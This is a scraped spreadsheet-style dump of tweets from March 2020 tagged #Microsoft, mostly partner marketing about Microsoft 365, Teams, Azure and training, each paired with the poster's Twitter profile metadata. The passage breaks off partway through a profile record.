    <t>{'id': 3257146604, 'id_str': '3257146604', 'name': 'T Gilbert, JD', 'screen_name': 'tponews', 'location': 'USA ', 'description': "There's no White or Black or Brown America, weâ€™re all Americans. Click below and buy my bookðŸ‘‡", 'url': 'https://t.co/xg5oaClZfL', 'entities': {'url': {'urls': [{'url': 'https://t.co/xg5oaClZfL', 'expanded_url': 'http://books.apple.com/us/book/id1299490708', 'display_url': 'books.apple.com/us/book/id1299â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31694, 'friends_count': 4537, 'listed_count': 244, 'created_at': 'Fri Jun 26 23:54:50 +0000 2015', 'favourites_count': 126054, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 141661,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'http://pbs.twimg.com/profile_images/1193480967802912769/91CXM_Sj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193480967802912769/91CXM_Sj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3257146604/1582504884',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</si>
  <si>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12:36:59 +0000 2020</t>
  </si>
  <si>
    <t>We had a fantastic morning at our legal round table event with some of the South Wests leading law firms in partnership with Microsoft! Our experts were discussing challenges law firms are facing and how they can adopt Microsoft Technologies to help overcome these. 
#Microsoft https://t.co/mlfnz8Zx4z</t>
  </si>
  <si>
    <t>Tue Mar 03 12:35:57 +0000 2020</t>
  </si>
  <si>
    <t>Unix Timestamp - per definition in UTC. Windows Powershell: No, here is the timestamp in your local time zone. #FUCKUP #WINDOWS #MICROSOFT</t>
  </si>
  <si>
    <t>{'id': 32507153, 'id_str': '32507153', 'name': 'Martin Weber', 'screen_name': 'arogarth', 'location': 'Gladenbach', 'description': '', 'url': 'http://t.co/f5166y5qOL', 'entities': {'url': {'urls': [{'url': 'http://t.co/f5166y5qOL', 'expanded_url': 'http://www.arogarth.net', 'display_url': 'arogarth.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 136, 'friends_count': 231, 'listed_count': 5, 'created_at': 'Fri Apr 17 18:18:07 +0000 2009', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3808,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'http://pbs.twimg.com/profile_images/1113357538450395137/NqJsNOxn_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113357538450395137/NqJsNOxn_normal.png', 'profile_link_color': 'FF0000',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</si>
  <si>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12:35:36 +0000 2020</t>
  </si>
  <si>
    <t>Attending Microsoft Build 2020 in Seattle, Washington
Who will i meet there ?
#microsoft #inovate #crypto #technology #learn #grow #meet</t>
  </si>
  <si>
    <t>{'id': 577393882, 'id_str': '577393882', 'name': 'Siebe verschaeve', 'screen_name': 'SiebeVerschaeve', 'location': '', 'description': 'Microsoft Integration Consultant. \nCAO of â€œCryptocurrency Investingâ€ @facebook  \nCommunity advocate @Chainlink', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 705, 'friends_count': 142, 'listed_count': 2, 'created_at': 'Fri May 11 19:19:34 +0000 2012', 'favourites_count': 3259, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1444,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'http://pbs.twimg.com/profile_images/1222657336688463874/q5-4GQUb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222657336688463874/q5-4GQUb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/577393882/1558311606',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</si>
  <si>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12:35:05 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft &amp;amp; Tablet Academy are working together to provide schools, colleges and trusts' free support to review their current use of technology, in order to embed a sustainable 3-year digital strategy. Find out more here:
https://t.co/VDf7wZ27t0
#microsoft #teaching https://t.co/YRSXlxRNNX</t>
  </si>
  <si>
    <t>Tue Mar 03 12:31:30 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/ZDJlz6HogZ</t>
  </si>
  <si>
    <t>Tue Mar 03 12:31:00 +0000 2020</t>
  </si>
  <si>
    <t>Power BI For Mac: A simple Definition
#Powerbi #Microsoft #powerbitraining #Windows @onlineitguru @meenati3 
https://t.co/8Oc8ThzQGs https://t.co/Ls4DPbObJo</t>
  </si>
  <si>
    <t>{'id': 938994941870477313, 'id_str': '938994941870477313', 'name': 'meenati', 'screen_name': 'meenati3', 'location': 'Hyderabad, India', 'description': 'SEO ex', 'url': 'https://t.co/QOm4vxR8Iq', 'entities': {'url': {'urls': [{'url': 'https://t.co/QOm4vxR8Iq', 'expanded_url': 'https://onlineitguru.com/reactjs-training.html', 'display_url': 'onlineitguru.com/reactjs-trainiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 239, 'friends_count': 718, 'listed_count': 6, 'created_at': 'Fri Dec 08 04:53:34 +0000 2017', 'favourites_count': 1265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5612, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/939003888409108480/zJtG82qq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/939003888409108480/zJtG82qq_normal.jpg',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</si>
  <si>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12:30:30 +0000 2020</t>
  </si>
  <si>
    <t>Free #VoIP &amp;amp; Messaging #utilities : #Microsoft #skype 8.57.0.116 - #Windows10 Ready | https://t.co/u69UiqLLOe https://t.co/nPxOcOsH57</t>
  </si>
  <si>
    <t>{'id': 347916078, 'id_str': '347916078', 'name': '3dfxzone.it', 'screen_name': '3dfxzone', 'location': 'Internet', 'description': 'Your reference source for 3dfx universe as well as for hardware, software, and games related topics. On line since Q1 2001, enhancing yours and ours passions!', 'url': 'https://t.co/zcdfVMyAuz', 'entities': {'url': {'urls': [{'url': 'https://t.co/zcdfVMyAuz', 'expanded_url': 'https://www.3dfxzone.it/', 'display_url': '3dfxzone.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 191, 'listed_count': 2, 'created_at': 'Wed Aug 03 15:38:39 +0000 2011', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5374,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'http://pbs.twimg.com/profile_images/1091097871389212673/WSjKbq7B_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1091097871389212673/WSjKbq7B_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/347916078/1549063084', 'profile_link_color': 'FF6600',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</si>
  <si>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12:30:29 +0000 2020</t>
  </si>
  <si>
    <t>How to Use Excel: 18 Simple Excel Tips, Tricks, and Shortcuts https://t.co/Z8WemIPjq2 #excel #tips #microsoft #microsoftoffice</t>
  </si>
  <si>
    <t>{'id': 39667408, 'id_str': '39667408', 'name': 'Roger Pierce', 'screen_name': 'RogerPierce', 'location': 'Toronto, Canada', 'description': 'Startup Expert. Diehard Entrepreneur. Canadian.', 'url': 'https://t.co/b8STPufuPV', 'entities': {'url': {'urls': [{'url': 'https://t.co/b8STPufuPV', 'expanded_url': 'http://www.RogerPierce.ca', 'display_url': 'RogerPierce.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 804, 'friends_count': 1595, 'listed_count': 304, 'created_at': 'Wed May 13 02:34:22 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7320, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9BE81E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/979360033006743552/aBpa_V_N_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979360033006743552/aBpa_V_N_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39667408/1522333320', 'profile_link_color': '133999',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</si>
  <si>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12:30:14 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftTeams releases several major #collaboration improvements with #Outlook integration and a new #SharePoint user experience.  Read their blog post with all the details: 
https://t.co/3wlpzdCSap #worksmart #Microsoft @SharePoint @Outlook</t>
  </si>
  <si>
    <t>{'id': 152370218, 'id_str': '152370218', 'name': 'Sandy Jacolow', 'screen_name': 'thingssandy', 'location': 'New York', 'description': 'Meridian Capital - Chief Information Officer (#CIO) covering #RealEstate #Technology #Innovation #PropTech #SocialMedia #CyberSecurity and more...', 'url': 'https://t.co/kqaJyenqs8', 'entities': {'url': {'urls': [{'url': 'https://t.co/kqaJyenqs8', 'expanded_url': 'http://www.facebook.com/thingssandy', 'display_url': 'facebook.com/thingssandy', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 540, 'friends_count': 273, 'listed_count': 61, 'created_at': 'Sat Jun 05 19:31:23 +0000 2010', 'favourites_count': 514, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1168,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'http://pbs.twimg.com/profile_images/922982447825944576/uZiZRD4t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/922982447825944576/uZiZRD4t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/152370218/1448595980',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</si>
  <si>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Tue Mar 03 12:28:12 +0000 2020</t>
  </si>
  <si>
    <t>CIO shares the insights he gained over the years   its about why he recommends Microsoft 365
https://t.co/8EVPTR5N8I
#microsoft #microsoft365 #m365 #rpsconsulting https://t.co/yekq5Z4hxF</t>
  </si>
  <si>
    <t>{'id': 879982439224954880, 'id_str': '879982439224954880', 'name': 'RPS Consulting', 'screen_name': 'ConsultingRps', 'location': 'Bengaluru, India', 'description': 'RPS Consulting is an established provider of Certified IT and Behavioral/Leadership Education to enterprises across India and the globe.', 'url': 'https://t.co/lYIxJhdyaN', 'entities': {'url': {'urls': [{'url': 'https://t.co/lYIxJhdyaN', 'expanded_url': 'http://www.rpsconsulting.in', 'display_url': 'rpsconsulting.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 40, 'listed_count': 2, 'created_at': 'Wed Jun 28 08:38:57 +0000 2017', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 118, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/879986918611501057/aDnJ3jML_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/879986918611501057/aDnJ3jML_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879982439224954880/1551936917',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</si>
  <si>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12:26:47 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/wn1i2W9OZ3
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/Yhb8CGV2gS</t>
  </si>
  <si>
    <t>{'id': 100455197, 'id_str': '100455197', 'name': 'Konark Verma', 'screen_name': 'konarkverma', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 82, 'listed_count': 1, 'created_at': 'Wed Dec 30 09:26:03 +0000 2009', 'favourites_count': 6064, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2155,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'http://pbs.twimg.com/profile_images/1007129230/DSC03240-Edited_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007129230/DSC03240-Edited_normal.JPG',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</si>
  <si>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Tue Mar 03 12:25:14 +0000 2020</t>
  </si>
  <si>
    <t>Cloud Computing - Enhanced Performance of Internet
Know More;
https://t.co/haH0KoHyjg
#aws,#cloudcomputing,#devops,#azure,#amazon,#amazonwebservices,#database,#innovation,#bigdata,#cloud,#datascience,#developer,#WelcomeBackScoups,#microsoft,#technology,#Fiesta4thWin,#google,#IoT https://t.co/qJbuxPPnDA</t>
  </si>
  <si>
    <t>Tue Mar 03 12:24:47 +0000 2020</t>
  </si>
  <si>
    <t>Is there any alternative for MCSD certification due to its retirement in 2020
#dotnet #dotnetcore #microsoft #developer #SoftwareEngineer</t>
  </si>
  <si>
    <t>{'id': 356840535, 'id_str': '356840535', 'name': 'Abdulraheem Abdullah', 'screen_name': 'Abdulraheem_Jan', 'location': 'Jeddah - Dhahran', 'description': 'ÙˆØµÙ„Øª Ù„Ù‚Ù†Ø§Ø¹Ø© Ø¨Ø£Ù†Ù‡ Ù„Ø§ Ø´ÙŠØ¡ Ù…Ø³ØªØ­ÙŠÙ„ Ø¹Ù„Ù‰ Ø§Ù„Ù…Ø±Ø¡ ÙƒÙˆÙ†Ù‡ ØŒ ÙØ¨Ø§Ù…ÙƒØ§Ù†Ù‡ ØªØ¹Ù„Ù… Ø£ÙŠ Ø´ÙŠØ¡ Ùˆ Ø§ØªÙ‚Ø§Ù†Ù‡ Ø¨ÙƒØ«Ø±Ø© Ø§Ù„Ù…Ù…Ø§Ø±Ø³Ø©. Ù…Ù‡Ù†Ø¯Ø³ Ø¨Ø±Ù…Ø¬ÙŠØ§ØªØŒ Ø®Ø±ÙŠØ¬ #KFUPM ØŒ Ù…Ø­Ù„Ù„ Ù†Ø¸Ù… ØªØ·Ø¨ÙŠÙ‚ÙŠØ© ÙÙŠ @ALKAHRABA', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 501, 'friends_count': 832, 'listed_count': 9, 'created_at': 'Wed Aug 17 13:11:30 +0000 2011', 'favourites_count': 105, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2880,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'http://pbs.twimg.com/profile_images/1025478720579166208/e6qtZW06_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1025478720579166208/e6qtZW06_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/356840535/1552052344', 'profile_link_color': '91D2FA', 'profile_sidebar_border_color': '204207', 'profile_sidebar_fill_color': '060A00', 'profile_text_color': '618238', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 12:24:33 +0000 2020</t>
  </si>
  <si>
    <t>Technology is just a tool, and a tool is only as useful as the person who wields it. How will you use the technology at your fingertips? #AI #microsoft https://t.co/PENTq7AQLO</t>
  </si>
  <si>
    <t>{'id': 778661362213978112, 'id_str': '778661362213978112', 'name': 'Solidify', 'screen_name': 'SolidifySE', 'location': 'Stockholm, Sverige', 'description': 'Microsoft partnered Devops consulting company based in Stockholm, Sweden.', 'url': 'https://t.co/1tHKfgNhHs', 'entities': {'url': {'urls': [{'url': 'https://t.co/1tHKfgNhHs', 'expanded_url': 'https://solidify.se', 'display_url': 'solidify.se', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 58, 'friends_count': 79, 'listed_count': 2, 'created_at': 'Wed Sep 21 18:25:10 +0000 2016', 'favourites_count': 188, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 219, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1088004673938833409/wzQAwrc5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088004673938833409/wzQAwrc5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/778661362213978112/1548235472',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</si>
  <si>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12:23:24 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/DvpGt4dHJB</t>
  </si>
  <si>
    <t>{'id': 1019937366251851777, 'id_str': '1019937366251851777', 'name': 'Defensorem Information Technology', 'screen_name': 'DefensoremIT', 'location': 'Tampa, FL', 'description': 'Tampa Bay Area Technology company serving the federal government and we love supporting the heartbeat of Tampa-the small and medium local businesses.', 'url': 'https://t.co/wd3Jb9Vkqw', 'entities': {'url': {'urls': [{'url': 'https://t.co/wd3Jb9Vkqw', 'expanded_url': 'http://www.defensorem.com', 'display_url': 'defensorem.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 179, 'friends_count': 1018, 'listed_count': 4, 'created_at': 'Thu Jul 19 13:29:52 +0000 2018', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 994, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1019961994257010688/9P5C6huX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1019961994257010688/9P5C6huX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1019937366251851777/1555683271',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</si>
  <si>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12:20:05 +0000 2020</t>
  </si>
  <si>
    <t>#TipTuesday Know where your #Office365 data is held? #Microsoft are offering the option of moving data, for a limited time. A local centre will mean faster speeds &amp;amp; with #Brexit &amp;amp; the potential impact on our data protection, it's wise to ensure your data is where it needs to be.</t>
  </si>
  <si>
    <t>Tue Mar 03 12:17:58 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #windows10 #New #Update To make just the text on your screen bigger, Select Start &amp;gt; Settings &amp;gt; Ease of Access &amp;gt; Display , then adjust the slider under Make text bigger.Type a message https://t.co/NnS8fMoQkw</t>
  </si>
  <si>
    <t>Tue Mar 03 12:14:47 +0000 2020</t>
  </si>
  <si>
    <t>Our customer demands are growing with more and more customers transitioning to the #Microsoft cloud choosing #makeitnoble as their go-to partner. Therefore our team is growing and we are excited to welcome 
@Dan_Christen! Daniel joins us as a #SeniorSystemEngineer  https://t.co/iEQD2sJahs</t>
  </si>
  <si>
    <t>{'id': 1062327698679312384, 'id_str': '1062327698679312384', 'name': 'makeitnoble', 'screen_name': 'makeitnoble', 'location': 'Berne, Switzerland', 'description': 'Global Solutions. Swiss Quality. #MicrosoftAzure #Microsoft365', 'url': 'https://t.co/XAquFnszio', 'entities': {'url': {'urls': [{'url': 'https://t.co/XAquFnszio', 'expanded_url': 'http://www.makeitnoble.com', 'display_url': 'makeitnoble.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 260, 'friends_count': 217, 'listed_count': 3, 'created_at': 'Tue Nov 13 12:53:55 +0000 2018', 'favourites_count': 378, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 401,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'http://pbs.twimg.com/profile_images/1121404761390157826/Vbh-zm33_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121404761390157826/Vbh-zm33_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1062327698679312384/1551947935', 'profile_link_color': '003C71',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</si>
  <si>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12:13:43 +0000 2020</t>
  </si>
  <si>
    <t>When was the last time disaster struck your IT infrastructure? If it hasn't happened yet, you're lucky. Safeguard against future mishaps and disaster with a comprehensive set of #Microsoft solutions tailored to secure your data. https://t.co/7yzEm8dzYW</t>
  </si>
  <si>
    <t>Tue Mar 03 12:13:20 +0000 2020</t>
  </si>
  <si>
    <t>Discover Microsoft's 3-step approach to GDPR. With #Microsoft 365, Communication Square LLC helps customers achieve compliance and stay secure. https://t.co/FaHpbeytDN</t>
  </si>
  <si>
    <t>Tue Mar 03 12:12:28 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/HTW6i3ckHt</t>
  </si>
  <si>
    <t>{'id': 41678090, 'id_str': '41678090', 'name': 'Adrian Edgar #AspiraCloud', 'screen_name': 'adrian_edgar', 'location': 'Warwickshire', 'description': "Director of AspiraCloud Ltd and speaker on strategic ICT Leadership and Change Management. Lots of good experiences that I'm willing to share. Baker for fun.", 'url': 'https://t.co/bHLkxBFJfY', 'entities': {'url': {'urls': [{'url': 'https://t.co/bHLkxBFJfY', 'expanded_url': 'http://www.aspiracloud.com', 'display_url': 'aspiracloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 447, 'friends_count': 690, 'listed_count': 108, 'created_at': 'Thu May 21 21:06:36 +0000 2009', 'favourites_count': 3992, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10621,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'http://pbs.twimg.com/profile_images/1127646844048297984/5g6CBQ_h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1127646844048297984/5g6CBQ_h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41678090/1536617135',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</si>
  <si>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12:12:27 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/4dvMYNGfIK</t>
  </si>
  <si>
    <t>{'id': 3011881671, 'id_str': '3011881671', 'name': 'AspiraCloud | Trusted Digital Delivery', 'screen_name': 'AspiraCloud', 'location': 'The Cloud', 'description': 'Lost in the clouds? Donâ€™t know your IasS from your SaaS? We can help you navigate the options available and get you working in the cloud in super quick time.', 'url': 'https://t.co/bHLkxBFJfY', 'entities': {'url': {'urls': [{'url': 'https://t.co/bHLkxBFJfY', 'expanded_url': 'http://www.aspiracloud.com', 'display_url': 'aspiracloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 89, 'friends_count': 153, 'listed_count': 115, 'created_at': 'Mon Feb 02 09:21:20 +0000 2015', 'favourites_count': 90, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5124,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'http://pbs.twimg.com/profile_images/909751236160835585/dWJNsNlD_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/909751236160835585/dWJNsNlD_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3011881671/1492033540', 'profile_link_color': '3890D0',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</si>
  <si>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12:11:29 +0000 2020</t>
  </si>
  <si>
    <t>Transform #data into intelligent action. Less time, more value with #Microsoft #Cortana. Contact ZMEDIA CORP to learn more. https://t.co/zZJPmK9Aav</t>
  </si>
  <si>
    <t>{'id': 256187544, 'id_str': '256187544', 'name': 'ZMEDIA CORPORATION', 'screen_name': 'zmediacorp', 'location': 'Cumberland, MD', 'description': 'Site design, print design, hosting, domain registration, video/streaming television, social media, cloud solutions, email marketing, etc.', 'url': 'https://t.co/SaEWTjpe7J', 'entities': {'url': {'urls': [{'url': 'https://t.co/SaEWTjpe7J', 'expanded_url': 'http://www.zmediacorp.net', 'display_url': 'zmediacorp.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 724, 'friends_count': 1402, 'listed_count': 10, 'created_at': 'Tue Feb 22 21:01:54 +0000 2011', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11924, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ED5C0E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1194271019621658625/iYNC90rp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1194271019621658625/iYNC90rp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/256187544/1568763317', 'profile_link_color': 'C10300', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '214E85', 'profile_text_color': '002F68', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 12:11:22 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/m9BbRVXmkW</t>
  </si>
  <si>
    <t>{'id': 893169540674224128, 'id_str': '893169540674224128', 'name': 'CriticalDesign', 'screen_name': 'CDA_Critical', 'location': '', 'description': 'An information technology company, committed to providing clients with greater efficiencies that center on people, platform and processes with proven results.', 'url': 'https://t.co/XYRopMelJK', 'entities': {'url': {'urls': [{'url': 'https://t.co/XYRopMelJK', 'expanded_url': 'http://www.criticaldesign.net', 'display_url': 'criticaldesign.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 73, 'friends_count': 220, 'listed_count': 1, 'created_at': 'Thu Aug 03 17:59:47 +0000 2017', 'favourites_count': 73, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 942, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1059500486003449857/st0y_dsA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1059500486003449857/st0y_dsA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/893169540674224128/1510764766',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</si>
  <si>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12:11:15 +0000 2020</t>
  </si>
  <si>
    <t>It's happening!! #DevOpsDaysNYC is at the most gorgeous location I've seen this year. Join emcee @jaydestro and amazing speakers today at the NY Academy of Medicine 
Come see #Microsoft @msdev @azureadvocates on the 3rd floor! https://t.co/EukWq9gmpe</t>
  </si>
  <si>
    <t>Tue Mar 03 12:08:46 +0000 2020</t>
  </si>
  <si>
    <t>"You recently worked with HubSpot Support Specialist Amanda Choo on ticket..." LEAVE FEEDBACK. Email received. Business that do this have excellent support. #Microsoft Azure do the same thing. #accountability</t>
  </si>
  <si>
    <t>{'id': 1064330257472208896, 'id_str': '1064330257472208896', 'name': 'Cameron Lynch - Etani', 'screen_name': 'EtaniLynch', 'location': 'Australia', 'description': 'Helping accounting firms deliver Power BI as a service to their SME clients\n\nCameron is experienced with Business Intelligence (BI), Analytics &amp; Big Data', 'url': 'https://t.co/qEbPcBl24k', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEbPcBl24k', 'expanded_url': 'http://www.etani.com.au', 'display_url': 'etani.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 105, 'friends_count': 177, 'listed_count': 2, 'created_at': 'Mon Nov 19 01:31:22 +0000 2018', 'favourites_count': 275, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 129,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'http://pbs.twimg.com/profile_images/1154637358043521025/a67fZLAG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154637358043521025/a67fZLAG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1064330257472208896/1563697744', 'profile_link_color': '353739',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</si>
  <si>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12:08:19 +0000 2020</t>
  </si>
  <si>
    <t>Watch unique 360 video experiences from inside #Microsoft. https://t.co/5IRFxsWRBf</t>
  </si>
  <si>
    <t>Tue Mar 03 12:06:28 +0000 2020</t>
  </si>
  <si>
    <t>When the time came for the University of Arizona to consolidate their multiple Active Directory domains and modernize their internal network, CatNet, they trusted #Microsoft for a smooth transition and a focus on security. https://t.co/BEFqEw9j6i https://t.co/uIADaVv7zj</t>
  </si>
  <si>
    <t>{'id': 352715474, 'id_str': '352715474', 'name': 'Blue Chip Tech.', 'screen_name': 'bluechiptt', 'location': 'Trinidad and Tobago', 'description': '', 'url': 'http://t.co/TrzpGAfVzo', 'entities': {'url': {'urls': [{'url': 'http://t.co/TrzpGAfVzo', 'expanded_url': 'http://www.bluechiptt.com', 'display_url': 'bluechiptt.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 13, 'listed_count': 9, 'created_at': 'Thu Aug 11 00:31:17 +0000 2011', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6659, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '001C42', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/936947567174205443/PZZ00H_U_normal.jpg', 'profile_image_url_https': 